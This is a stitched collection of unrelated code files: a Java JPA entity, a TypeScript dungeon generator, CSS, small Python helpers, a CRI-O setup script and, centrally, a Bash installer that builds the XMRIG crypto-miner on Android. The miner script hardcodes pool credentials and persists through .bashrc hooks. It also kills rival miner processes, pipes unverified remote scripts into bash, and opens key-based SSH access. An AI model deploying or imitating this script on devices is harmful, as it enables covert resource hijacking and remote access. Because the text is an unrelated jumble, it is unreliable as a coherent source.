print(count_parameters([(3, 64, 3), (64, 128, 3), (128, 256, 3)]))  # Output: 370816
/*
* Copyright 2014 akquinet engineering GmbH
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package de.akquinet.engineering.vaadinator.example.crmws.model;
import java.io.Serializable;
import java.util.Date;
import javax.persistence.Entity;
import javax.persistence.FetchType;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.ManyToOne;
import javax.persistence.Table;
import javax.persistence.Temporal;
import javax.persistence.TemporalType;
import de.akquinet.engineering.vaadinator.annotations.MapBean;
import de.akquinet.engineering.vaadinator.annotations.MapBeanSetting;
import de.akquinet.engineering.vaadinator.annotations.MapProperty;
import de.akquinet.engineering.vaadinator.annotations.MapPropertySetting;
import de.akquinet.engineering.vaadinator.annotations.ServiceBean;
import de.akquinet.engineering.vaadinator.example.crmws.dto.HistoryDto;
/**
 * JPA entity for a single history entry attached to a {@code Contact}.
 * Mapped to DTOs via Vaadinator's {@code @MapBean} profiles: read-only id in
 * both profiles; "historyOnly" additionally maps back (bidirectional).
 */
@MapBean(profiles = { @MapBeanSetting(profileName = "contactInclHistory", target = HistoryDto.class),
        @MapBeanSetting(profileName = "historyOnly", target = HistoryDto.class, bidirectional = true) })
@Entity
@Table(name="CrmHistory")
@ServiceBean
public class History implements Serializable {

    /**
     *
     */
    private static final long serialVersionUID = 1L;

    @Id
    @GeneratedValue(strategy = GenerationType.IDENTITY)
    @MapProperty(profileSettings = { @MapPropertySetting(profileName = "contactInclHistory", readonly = true),
            @MapPropertySetting(profileName = "historyOnly", readonly = true) })
    private long id;

    // Creation time; defaults to "now" when the entity is instantiated.
    @MapProperty
    @Temporal(TemporalType.TIMESTAMP)
    private Date timestamp = new Date();

    @MapProperty
    private String text;

    // Owning contact; lazily fetched, not exposed through @MapProperty.
    @ManyToOne(fetch = FetchType.LAZY)
    private Contact parentContact = null;

    public long getId() {
        return id;
    }

    // Package-private on purpose: the id is assigned by the database.
    void setId(long id) {
        this.id = id;
    }

    public Date getTimestamp() {
        return timestamp;
    }

    public void setTimestamp(Date timestamp) {
        this.timestamp = timestamp;
    }

    public String getText() {
        return text;
    }

    public void setText(String text) {
        this.text = text;
    }

    public Contact getParentContact() {
        return parentContact;
    }

    public void setParentContact(Contact parentContact) {
        this.parentContact = parentContact;
    }
}
|
<reponame>n1kk018/OnWine-Admin
// Barrel file: re-export everything from the order column chart component.
export * from './orderColumnChart.component';
|
<filename>src/scripts/helpers/generateDungeonRun.ts<gh_stars>0
import { DungeonLevelData, DungeonRunData } from '../models/DungeonRunData';
import { SecondaryContentBlock } from '../models/SecondaryContentBlock';
import { RuneAssignment } from './constants';
import ContentDataLibrary from './ContentDataLibrary';
import globalState from '../worldstate/index';
// Probability that a secondary content slot is filled from the blocks whose
// themes match the player's secondary rune (vs. a random non-matching one).
const CHANCE_FOR_MATCHING_SECONDARY_CONTENT = 0.5;

/**
 * Assemble a randomized dungeon run from the rune assignment:
 * pick one primary content block matching the primary rune (and whose quest
 * preconditions are met), attach a random number of secondary content blocks,
 * and distribute their rooms over the primary block's dungeon levels.
 */
export const generateDungeonRun: (runes: RuneAssignment) => DungeonRunData = (runes) => {
	const matchingPrimaryContents = ContentDataLibrary.primaryContent.filter((primaryContent) => {
		if (!primaryContent.themes.includes(runes.primaryContent)) {
			return false;
		}
		const requiredQuests = primaryContent.requiredQuests || [];
		// Each case returns true when the quest-state precondition is VIOLATED.
		const unmetPrecondition = requiredQuests.find(([questId, requiredStatus]) => {
			const quest = globalState.quests[questId];
			switch (requiredStatus) {
				case 'open': {
					return !!quest;
				}
				case 'started': {
					return !quest || quest.questFinished;
				}
				case 'not-finished': {
					return quest && quest.questFinished;
				}
				case 'finished': {
					return !quest || !quest.questFinished;
				}
			}
		});
		return !unmetPrecondition;
	});
	// NOTE(review): if no primary content matches, this indexes into an empty
	// array and selectedPrimaryContent is undefined -- confirm callers
	// guarantee at least one match per rune.
	const randomIndex = Math.floor(Math.random() * matchingPrimaryContents.length);
	const selectedPrimaryContent = matchingPrimaryContents[randomIndex];
	// tslint:disable-next-line: no-console
	console.log(`--> Using primary block ${selectedPrimaryContent.title}`);
	// Roll how many secondary blocks to attach, within the primary's bounds.
	const { lowerBoundOfSecondaryContentBlocks, upperBoundOfSecondaryContentBlocks } =
		selectedPrimaryContent;
	const numSecondaryContents =
		lowerBoundOfSecondaryContentBlocks +
		Math.floor(
			Math.random() * (upperBoundOfSecondaryContentBlocks - lowerBoundOfSecondaryContentBlocks + 1)
		);
	const secondaryContentBlocks: SecondaryContentBlock[] = [];
	const matchingSecondaryBlocks = ContentDataLibrary.secondaryContent.filter((secondaryContent) =>
		secondaryContent.themes.includes(runes.secondaryContent)
	);
	const nonMatchingSecondaryBlocks = ContentDataLibrary.secondaryContent.filter(
		(secondaryContent) => !secondaryContent.themes.includes(runes.secondaryContent)
	);
	for (let i = 0; i < numSecondaryContents; i++) {
		let usedSecondaryBlock: SecondaryContentBlock;
		// splice() removes the pick so the same block is not used twice.
		// NOTE(review): splice on an exhausted pool yields undefined -- verify
		// the libraries always hold enough blocks for the rolled count.
		if (Math.random() < CHANCE_FOR_MATCHING_SECONDARY_CONTENT) {
			const randomSecondaryIndex = Math.floor(Math.random() * matchingSecondaryBlocks.length);
			usedSecondaryBlock = matchingSecondaryBlocks.splice(randomSecondaryIndex, 1)[0];
			// tslint:disable-next-line: no-console
			console.log(`--> Using matching secondary block ${usedSecondaryBlock.title}`);
		} else {
			const randomSecondaryIndex = Math.floor(Math.random() * nonMatchingSecondaryBlocks.length);
			usedSecondaryBlock = nonMatchingSecondaryBlocks.splice(randomSecondaryIndex, 1)[0];
			// tslint:disable-next-line: no-console
			console.log(`--> Using non-matching secondary block ${usedSecondaryBlock.title}`);
		}
		secondaryContentBlocks.push(usedSecondaryBlock);
	}
	// Spread each secondary block's rooms over the dungeon levels, keeping
	// their relative order (each room is placed on a level strictly after
	// the previous one, while leaving space for the rooms still to place).
	const secondaryContentRoomAssignment: { [level: number]: string[] } = {};
	secondaryContentBlocks.forEach((contentBlock) => {
		let firstFreeLevel = 0;
		for (let i = 0; i < contentBlock.rooms.length; i++) {
			const blocksLeftToPlace = contentBlock.rooms.length - i - 1;
			const roomMaxLevel = selectedPrimaryContent.dungeonLevels.length - blocksLeftToPlace;
			const randomLevel =
				firstFreeLevel + Math.floor((roomMaxLevel - firstFreeLevel) * Math.random());
			if (!secondaryContentRoomAssignment[randomLevel]) {
				secondaryContentRoomAssignment[randomLevel] = [];
			}
			secondaryContentRoomAssignment[randomLevel].push(...contentBlock.rooms[i]);
			firstFreeLevel = randomLevel + 1;
		}
	});
	// Merge assigned secondary rooms into each primary dungeon level.
	const levels: DungeonLevelData[] = selectedPrimaryContent.dungeonLevels.map(
		(dungeonLevel, level) => ({
			...dungeonLevel,
			rooms: [...dungeonLevel.rooms, ...(secondaryContentRoomAssignment[level] || [])],
			isDungeon: true,
		})
	);
	return {
		levels,
		buff: runes.playerBuff,
		primaryContentBlock: selectedPrimaryContent,
		secondaryContentBlocks,
	};
};
|
#!/usr/bin/env bash
#=============================================================
# https://github.com/cornjosh/Aminer
# A script that help you install miner software XMRIG on Android device
# Version: 1.0
# Author: cornjosh
# Blog: https://linkyou.top
#=============================================================
USER="12345"
PASS=''
ALGO="astrobwt"
MIMING_URL="mine.c3pool.com:13333"
VERSION=1.0
TOS=''
UBUNTU_VERSION=20.04.1
DONATE=1
RED_FONT_PREFIX="\033[31m"
LIGHT_GREEN_FONT_PREFIX="\033[1;32m"
LIGHT_BLUE_FONT_PREFIX="\033[1;34m"
FONT_COLOR_SUFFIX="\033[0m"
# Print an informational message (green tag).
INFO(){
    echo -e "[${LIGHT_GREEN_FONT_PREFIX}INFO${FONT_COLOR_SUFFIX}] $1"
}
# Print an error message (red tag).
ERROR(){
    echo -e "[${RED_FONT_PREFIX}ERROR${FONT_COLOR_SUFFIX}] $1"
}
# Print a section heading (blue).
HEAD(){
    echo -e "${LIGHT_BLUE_FONT_PREFIX}##### $1 #####${FONT_COLOR_SUFFIX}"
}
# Greeting + terms-of-service gate; exits 0 when the user declines.
HELLO(){
    HEAD "Aminer"
    echo "Aminer is a script that help you install miner software XMRIG on Android device. @v$VERSION
You can find the source code from https://github.com/cornjosh/Aminer
"
    [ "$TOS" == '' ] && read -e -p "You are already understand the risks of the script.(Y/n)" TOS
    [ "$TOS" == 'n' ] || [ "$TOS" == 'N' ] && ERROR "Canceled by user" && exit 0
}
# Print command-line usage.  The trailing commented lines document options
# from an earlier sshd-setup variant of the script, kept for reference.
USAGE(){
    echo "Aminer - A script that help you install miner software XMRIG on Android device @v$VERSION
Usage:
  bash <(curl -fsSL git.io/aminer) [options...] <arg>
Options:
  -y  Auto mode, ignore risks warning
  -u  Pool's user, the arguments like [username]
  -p  Pool's password, the arguments like [password]
  -a  mining algorithm
  -o  Pool's url, the arguments like [mine.pool.example:1234]
  -d  Donate level to XMRIG's developers (not me),the arguments like [1]
  -g  Setup sshd with Github name, the arguments like [cornjosh]"
#  -o  Overwrite mode, this option is valid at the top
#  -g  Get the public key from GitHub, the arguments is the GitHub ID
#  -u  Get the public key from the URL, the arguments is the URL
#  -f  Get the public key from the local file, the arguments is the local file path
#  -p  Change SSH port, the arguments is port number
#  -d  Disable password login
}
# Default the pool password to "Aminer-<device model>" (whitespace stripped)
# when none was supplied on the command line.
GET_PASS(){
    [ "$PASS" == '' ] && PASS="Aminer-$(getprop ro.product.vendor.model|sed s/[[:space:]]//g)"
}
# Top-level Ubuntu-in-Termux setup: install deps, then download and unpack
# the rootfs into $HOME/ubuntu-in-termux.
UBUNTU(){
    INFO "Upgrading packages" && pkg update && pkg upgrade -y
    INFO "Installing dependency" && pkg install wget proot -y
    cd "$HOME" || exit
    # NOTE(review): mkdir fails (non-fatal here) if the directory exists;
    # subsequent steps cd into it explicitly, so reruns still work.
    mkdir ubuntu-in-termux && INFO "Create $HOME/ubuntu-in-termux"
    UBUNTU_DOWNLOAD
    UBUNTU_INSTALL
    INFO "Ubuntu setup complete"
}
# Download the Ubuntu base rootfs tarball matching the device architecture
# (from the USTC mirror) into $HOME/ubuntu-in-termux/ubuntu.tar.gz.
UBUNTU_DOWNLOAD(){
    HEAD "Download Ubuntu"
    cd "$HOME/ubuntu-in-termux" || exit
    [ -f "ubuntu.tar.gz" ] && rm -rf ubuntu.tar.gz && INFO "Remove old ubuntu image"
    # Map dpkg's architecture naming onto Ubuntu cdimage naming.
    local ARCHITECTURE=$(dpkg --print-architecture)
    case "$ARCHITECTURE" in
        aarch64)
            ARCHITECTURE=arm64
            ;;
        arm)
            ARCHITECTURE=armhf
            ;;
        amd64|x86_64)
            ARCHITECTURE=amd64
            ;;
        *)
            ERROR "Unsupported architecture :- $ARCHITECTURE" && exit 1
            ;;
    esac
    INFO "Device architecture :- $ARCHITECTURE"
    INFO "Downloading Ubuntu image"
    wget https://mirrors.ustc.edu.cn/ubuntu-cdimage/ubuntu-base/releases/${UBUNTU_VERSION}/release/ubuntu-base-${UBUNTU_VERSION}-base-${ARCHITECTURE}.tar.gz -O ubuntu.tar.gz
}
# Unpack the downloaded rootfs, patch DNS, stub out binaries that break
# under proot, and generate the startubuntu.sh launcher.
# NOTE: the heredoc escapes '$' for variables that must expand at *runtime*
# inside startubuntu.sh, while $directory expands now, at generation time.
UBUNTU_INSTALL(){
    HEAD "Install Ubuntu"
    local directory=ubuntu-fs
    cd "$HOME/ubuntu-in-termux" || exit
    local cur=$(pwd)
    mkdir -p $directory && INFO "Create $HOME/ubuntu-in-termux/$directory"
    cd $directory || exit
    INFO "Decompressing the ubuntu rootfs" && tar -zxf "$cur/ubuntu.tar.gz" --exclude='dev' && INFO "The ubuntu rootfs have been successfully decompressed"
    printf "nameserver 8.8.8.8\nnameserver 8.8.4.4\n" > etc/resolv.conf && INFO "Fixing the resolv.conf"
    # Replace binaries that misbehave under proot with no-op scripts.
    stubs=()
    stubs+=('usr/bin/groups')
    for f in "${stubs[@]}";do
        INFO "Writing stubs"
        echo -e "#!/bin/sh\nexit" > "$f"
    done
    INFO "Successfully wrote stubs"
    cd "$cur" || exit
    mkdir -p ubuntu-binds
    local bin=startubuntu.sh
    INFO "Creating the start script"
    cat > $bin <<- EOM
#!/bin/bash
cd \$(dirname \$0)
## unset LD_PRELOAD in case termux-exec is installed
unset LD_PRELOAD
command="proot"
## uncomment following line if you are having FATAL: kernel too old message.
#command+=" -k 4.14.81"
command+=" --link2symlink"
command+=" -0"
command+=" -r $directory"
if [ -n "\$(ls -A ubuntu-binds)" ]; then
    for f in ubuntu-binds/* ;do
        . \$f
    done
fi
command+=" -b /dev"
command+=" -b /proc"
command+=" -b /sys"
command+=" -b ubuntu-fs/tmp:/dev/shm"
command+=" -b /data/data/com.termux"
command+=" -b /:/host-rootfs"
command+=" -b /sdcard"
command+=" -b /storage"
command+=" -b /mnt"
command+=" -w /root"
command+=" /usr/bin/env -i"
command+=" HOME=/root"
command+=" PATH=/usr/local/sbin:/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin:/usr/games:/usr/local/games"
command+=" TERM=\$TERM"
command+=" LANG=C.UTF-8"
command+=" /bin/bash --login"
com="\$@"
if [ -z "\$1" ];then
    exec \$command
else
    \$command -c "\$com"
fi
EOM
    termux-fix-shebang $bin
    chmod +x $bin
    rm ubuntu.tar.gz -rf && INFO "Delete Ubuntu image"
    INFO "Ubuntu $UBUNTU_VERSION install complete"
}
#install_ubuntu(){
# pkg update && pkg upgrade -y
# pkg install wget proot -y
# cd "$HOME" || exit
# mkdir ubuntu-in-termux
# cd ubuntu-in-termux || exit
# install1
# cd "$HOME" || exit
#}
#
#install1 () {
#time1="$( date +"%r" )"
#directory=ubuntu-fs
#UBUNTU_VERSION=20.04.1
#if [ -d "$directory" ];then
#first=1
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;227m[WARNING]:\e[0m \x1b[38;5;87m Skipping the download and the extraction\n"
#elif [ -z "$(command -v proot)" ];then
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;203m[ERROR]:\e[0m \x1b[38;5;87m Please install proot.\n"
#printf "\e[0m"
#exit 1
#elif [ -z "$(command -v wget)" ];then
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;203m[ERROR]:\e[0m \x1b[38;5;87m Please install wget.\n"
#printf "\e[0m"
#exit 1
#fi
#if [ "$first" != 1 ];then
#if [ -f "ubuntu.tar.gz" ];then
#rm -rf ubuntu.tar.gz
#fi
#if [ ! -f "ubuntu.tar.gz" ];then
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Downloading the ubuntu rootfs, please wait...\n"
#ARCHITECTURE=$(dpkg --print-architecture)
#case "$ARCHITECTURE" in
#aarch64) ARCHITECTURE=arm64;;
#arm) ARCHITECTURE=armhf;;
#amd64|x86_64) ARCHITECTURE=amd64;;
#*)
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;203m[ERROR]:\e[0m \x1b[38;5;87m Unknown architecture :- $ARCHITECTURE"
#exit 1
#;;
#
#esac
#
#wget https://mirrors.ustc.edu.cn/ubuntu-cdimage/ubuntu-base/releases/${UBUNTU_VERSION}/release/ubuntu-base-${UBUNTU_VERSION}-base-${ARCHITECTURE}.tar.gz -O ubuntu.tar.gz
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Download complete!\n"
#
#fi
#
#cur=`pwd`
#mkdir -p $directory
#cd $directory
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Decompressing the ubuntu rootfs, please wait...\n"
#tar -zxf $cur/ubuntu.tar.gz --exclude='dev'||:
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m The ubuntu rootfs have been successfully decompressed!\n"
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Fixing the resolv.conf, so that you have access to the internet\n"
#printf "nameserver 8.8.8.8\nnameserver 8.8.4.4\n" > etc/resolv.conf
#stubs=()
#stubs+=('usr/bin/groups')
#for f in ${stubs[@]};do
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Writing stubs, please wait...\n"
#echo -e "#!/bin/sh\nexit" > "$f"
#done
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Successfully wrote stubs!\n"
#cd $cur
#
#fi
#
#mkdir -p ubuntu-binds
#bin=startubuntu.sh
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Creating the start script, please wait...\n"
#cat > $bin <<- EOM
##!/bin/bash
#cd \$(dirname \$0)
### unset LD_PRELOAD in case termux-exec is installed
#unset LD_PRELOAD
#command="proot"
### uncomment following line if you are having FATAL: kernel too old message.
##command+=" -k 4.14.81"
#command+=" --link2symlink"
#command+=" -0"
#command+=" -r $directory"
#if [ -n "\$(ls -A ubuntu-binds)" ]; then
# for f in ubuntu-binds/* ;do
# . \$f
# done
#fi
#command+=" -b /dev"
#command+=" -b /proc"
#command+=" -b /sys"
#command+=" -b ubuntu-fs/tmp:/dev/shm"
#command+=" -b /data/data/com.termux"
#command+=" -b /:/host-rootfs"
#command+=" -b /sdcard"
#command+=" -b /storage"
#command+=" -b /mnt"
#command+=" -w /root"
#command+=" /usr/bin/env -i"
#command+=" HOME=/root"
#command+=" PATH=/usr/local/sbin:/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin:/usr/games:/usr/local/games"
#command+=" TERM=\$TERM"
#command+=" LANG=C.UTF-8"
#command+=" /bin/bash --login"
#com="\$@"
#if [ -z "\$1" ];then
# exec \$command
#else
# \$command -c "\$com"
#fi
#EOM
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m The start script has been successfully created!\n"
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Fixing shebang of startubuntu.sh, please wait...\n"
#termux-fix-shebang $bin
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Successfully fixed shebang of startubuntu.sh! \n"
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Making startubuntu.sh executable please wait...\n"
#chmod +x $bin
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Successfully made startubuntu.sh executable\n"
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Cleaning up please wait...\n"
#rm ubuntu.tar.gz -rf
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m Successfully cleaned up!\n"
#printf "\x1b[38;5;214m[${time1}]\e[0m \x1b[38;5;83m[Installer thread/INFO]:\e[0m \x1b[38;5;87m The installation has been completed! You can now launch Ubuntu with ./startubuntu.sh\n"
#printf "\e[0m"
#
#}
# UBUNTU_START: launch the proot-ed Ubuntu environment created above.
UBUNTU_START(){
INFO "Start up Ubuntu..." && bash "$HOME/ubuntu-in-termux/startubuntu.sh"
}
# TERMUX_BASHRC: make Termux auto-enter Ubuntu on every new shell.
# NOTE(review): appends unconditionally — repeated runs add duplicate lines.
TERMUX_BASHRC(){
INFO "Setting termux's .bashrc"
echo "bash $HOME/ubuntu-in-termux/startubuntu.sh" >> "$HOME/.bashrc"
}
# UBUNTU_INSTALL_BASHRC: drop an install.sh inside the Ubuntu rootfs that
# builds xmrig-C3 from source (with the donate level patched to $DONATE),
# and hook it into Ubuntu's root .bashrc so it runs once on first login.
# The heredoc is unquoted, so $DONATE is expanded here at write time.
UBUNTU_INSTALL_BASHRC(){
INFO "Setting Ubuntu's .bashrc and install.sh"
local bin="$HOME/ubuntu-in-termux/ubuntu-fs/root/install.sh"
cat > "$bin" <<- EOM
#!/bin/bash
RED_FONT_PREFIX="\033[31m"
BLUE_FONT_PREFIX="\033[34m"
LIGHT_GREEN_FONT_PREFIX="\033[1;32m"
LIGHT_BLUE_FONT_PREFIX="\033[1;34m"
FONT_COLOR_SUFFIX="\033[0m"
INFO(){
echo -e "[\${LIGHT_GREEN_FONT_PREFIX}INFO\${FONT_COLOR_SUFFIX}]\$1"
}
ERROR(){
echo -e "[\${RED_FONT_PREFIX}ERROR\${FONT_COLOR_SUFFIX}]\$1"
}
HEAD(){
echo -e "\${LIGHT_BLUE_FONT_PREFIX}##### \$1 #####\${FONT_COLOR_SUFFIX}"
}
HEAD "Upgrading packages"
apt-get update && apt-get upgrade -y
HEAD "Installing dependency"
apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
INFO "Getting xmrig source code"
git clone https://github.com/C3Pool/xmrig-C3.git
INFO "Changing donate level to $DONATE %"
sed -i 's/kDefaultDonateLevel = 1/kDefaultDonateLevel = $DONATE/g' ./xmrig-C3/src/donate.h
sed -i 's/kMinimumDonateLevel = 1/kMinimumDonateLevel = $DONATE/g' ./xmrig-C3/src/donate.h
mkdir xmrig-C3/build && cd xmrig-C3/build && cmake .. && make -j\$(nproc) && mv xmrig \$HOME && cd \$HOME && rm -rf xmrig-C3
INFO "XMRIG create success"
HEAD "Please restart Termux App to run XMRIG"
EOM
# Guard: only run the build when the xmrig binary is not there yet.
echo "[ ! -e ./xmrig ] && bash ./install.sh" >> "$HOME/ubuntu-in-termux/ubuntu-fs/root/.bashrc"
}
# UBUNTU_SERVICE_BASHRC: drop a service.sh watchdog inside the Ubuntu
# rootfs that kills stale instances and keeps xmrig running, and hook it
# into Ubuntu's root .bashrc. $USER/$PASS/$ALGO/$MIMING_URL are expanded
# at write time (unquoted heredoc); \$-escaped parts expand at run time.
UBUNTU_SERVICE_BASHRC(){
INFO "Setting Ubuntu's .bashrc and service.sh"
local bin="$HOME/ubuntu-in-termux/ubuntu-fs/root/service.sh"
cat > "$bin" <<- EOM
#!/bin/bash
RED_FONT_PREFIX="\033[31m"
BLUE_FONT_PREFIX="\033[34m"
LIGHT_GREEN_FONT_PREFIX="\033[1;32m"
LIGHT_BLUE_FONT_PREFIX="\033[1;34m"
FONT_COLOR_SUFFIX="\033[0m"
INFO(){
echo -e "[\${LIGHT_GREEN_FONT_PREFIX}INFO\${FONT_COLOR_SUFFIX}]\$1"
}
ERROR(){
echo -e "[\${RED_FONT_PREFIX}ERROR\${FONT_COLOR_SUFFIX}]\$1"
}
HEAD(){
echo -e "\${LIGHT_BLUE_FONT_PREFIX}##### \$1 #####\${FONT_COLOR_SUFFIX}"
}
HEAD "Aminer is starting"
cd "\$HOME"
INFO "Killing other Aminer"
ps -ef|grep service.sh|grep -v grep|grep -v \$\$|cut -c 9-15|xargs kill -s 9
ps -ef|grep xmrig|grep -v grep|cut -c 9-15|xargs kill -s 9
while true
do
PID_COUNT=\$(ps aux|grep ./xmrig |grep -v grep|wc -l)
if [ \$PID_COUNT -eq 0 ]
then
[ ! -e ./xmrig ] && ERROR "XMRIG is not found, exiting" && exit 1
INFO "XMRIG doesn't running, restarting..." && ./xmrig --randomx-mode=light --no-huge-pages -u $USER -p $PASS -a $ALGO -o $MIMING_URL
fi
sleep 15
done
EOM
echo "bash ./service.sh" >> "$HOME/ubuntu-in-termux/ubuntu-fs/root/.bashrc"
}
# SSH_INSTALL: install openssh in Termux, import the GitHub user $1's
# public keys via the SSH_Key_Installer script, start sshd (port 8022),
# and make it start on every new shell.
# NOTE(review): `bash <(curl ... git.io/key.sh)` executes a remote script
# unverified — consider pinning a checksum or vendoring it.
SSH_INSTALL(){
HEAD "Install and setup SSH"
INFO "Installing dependency" && pkg update && pkg install openssh -y
INFO "Running SSH_Key_Installer" && bash <(curl -fsSL git.io/key.sh) -g "$1"
INFO "Setting termux's .bashrc" && echo "sshd" >> "$HOME/.bashrc"
INFO "Starting sshd..." && sshd
HEAD "Finish"
# Best-effort LAN IP discovery for the final status message.
local IP=$(ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d '/')
INFO "SSH server running at: $IP:8022"
INFO "Login with any username and your private key"
}
# Entry point: parse CLI flags, then install (first run) and start Ubuntu.
#   -y  accept TOS            -u  wallet/user    -p  worker password
#   -a  algorithm             -o  pool URL       -d  donate level (%)
#   -g  GitHub user: set up SSH access instead of mining, then exit
while getopts "yu:p:a:o:d:g:" OPT; do
case $OPT in
y)
TOS="y"
;;
u)
USER=$OPTARG
;;
p)
PASS=$OPTARG
;;
a)
ALGO=$OPTARG
;;
o)
MIMING_URL=$OPTARG
;;
d)
DONATE=$OPTARG
;;
g)
# SSH-only mode: configure key-based sshd access and stop.
GITHUB_USER=$OPTARG
HELLO
SSH_INSTALL "$GITHUB_USER"
exit 0
;;
*)
USAGE
exit 1
;;
esac
done
HELLO
GET_PASS
# First run only: service.sh missing means the rootfs was never set up.
[ ! -e "$HOME/ubuntu-in-termux/ubuntu-fs/root/service.sh" ] && UBUNTU && TERMUX_BASHRC && UBUNTU_SERVICE_BASHRC && UBUNTU_INSTALL_BASHRC
UBUNTU_START
|
/**
 * Return the final path component (the file name) of a path string.
 * Works with both POSIX ('/') and Windows ('\') separators; a path that
 * contains no separator is returned unchanged.
 */
function extractFilename(filePath) {
    const separatorIndex = Math.max(
        filePath.lastIndexOf('/'),
        filePath.lastIndexOf('\\')
    );
    // When no separator exists, lastIndexOf yields -1 and slice(0) keeps all.
    return filePath.slice(separatorIndex + 1);
}
// Test cases
console.log(extractFilename("/home/user/documents/report.txt")); // Output: "report.txt"
console.log(extractFilename("C:\\Program Files\\example\\image.jpg")); // Output: "image.jpg" |
<reponame>leonlaf66/passport
# Convert comma-separated "key,value" lines from the file 'test' into PHP
# array entries of the form "\t'key' => 'value'," appended to rets.php.
#
# Fixes over the original: Python-3 print, no shadowing of the builtin
# `str`, and the bare `except` (which swallowed every error and printed a
# misleading "error when open file!") is narrowed to the one expected
# failure — a line without a comma — which is now reported and skipped
# instead of aborting the whole run.
with open('test') as src, open('rets.php', 'a') as dst:
    for line in src:
        fields = line.strip().split(',')
        try:
            entry = "\t'" + fields[0] + "' => '" + fields[1] + "',"
        except IndexError:
            # Malformed line (no comma): report it and keep going.
            print("skipping malformed line:", line.strip())
            continue
        dst.write(entry + "\n")
|
#!/bin/bash
# Install and configure CRI-O and runc on Ubuntu (Project Atomic PPA).
set -euo pipefail

# Working directories for the container runtimes.
# NOTE(review): crio_wrk_dir is declared but never used below — confirm
# whether a matching crio.conf root/runroot rewrite was intended.
readonly crio_wrk_dir="/tmp/crio"
readonly runc_wrk_dir="/tmp/runc"

# Install CRI-O and its dependencies
sudo apt-get update
sudo apt-get install -y software-properties-common
sudo add-apt-repository -y ppa:projectatomic/ppa
sudo apt-get update
sudo apt-get install -y cri-o

# Uncomment the relevant settings in /etc/crio/crio.conf and select the
# cgroupfs cgroup manager. (The original script ran this exact sed block
# twice; the second pass matched nothing and has been removed.)
sudo sed -i "s|^#.*\[crio.runtime\]|\[crio.runtime\]|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*conmon_cgroup = \"\"|conmon_cgroup = \"\"|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*conmon = \"/usr/local/bin/conmon\"|conmon = \"/usr/local/bin/conmon\"|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*pids_limit = 1024|pids_limit = 1024|g" /etc/crio/crio.conf
sudo sed -i "s|^#.*cgroup_manager = \"\"|cgroup_manager = \"cgroupfs\"|g" /etc/crio/crio.conf

# Install runc
sudo apt-get install -y runc
# Configure runc to use a specific working directory
sudo sed -i "s|^#.*root = \"/var/run/runc\"|root = \"$runc_wrk_dir\"|g" /etc/runc.conf
/* Globally reset default margins and paddings. */
* {
    margin: 0;
    padding: 0;
}
/* Header: static positioning (normal document flow), dark theme. */
header {
    position: static;
    background-color: #333;
    font-size: 1.2em;
    color: #fff;
}
/* Navigation sidebar: floats beside the main content at 20% width. */
nav {
    float: left;
    width: 20%;
    padding: 10px;
    background-color: #f2f2f2;
}
/* Main content area: fills the remaining 80% next to the nav.
   NOTE(review): nav has 10px padding on top of its 20% width, so
   20% + 80% + padding can exceed 100% and wrap unless box-sizing:
   border-box is applied elsewhere — confirm. */
main {
    width: 80%;
    float: left;
}
/* Footer: full-width dark bar.
   NOTE(review): no clear:both here — floats above may overlap; confirm. */
footer {
    width: 100%;
    background-color: #333;
    text-align: center;
    color: #fff;
}
package app
import com.google.inject.Guice
import play.api.GlobalSettings
import util.di.BaseModule
/**
* The global configuration.
*/
/**
 * The global configuration.
 *
 * NOTE(review): `GlobalSettings` is the legacy Play global object
 * (deprecated in Play 2.5+ in favour of runtime DI) — fine for the Play
 * version this project targets; confirm before upgrading.
 */
object Global extends GlobalSettings {
  /**
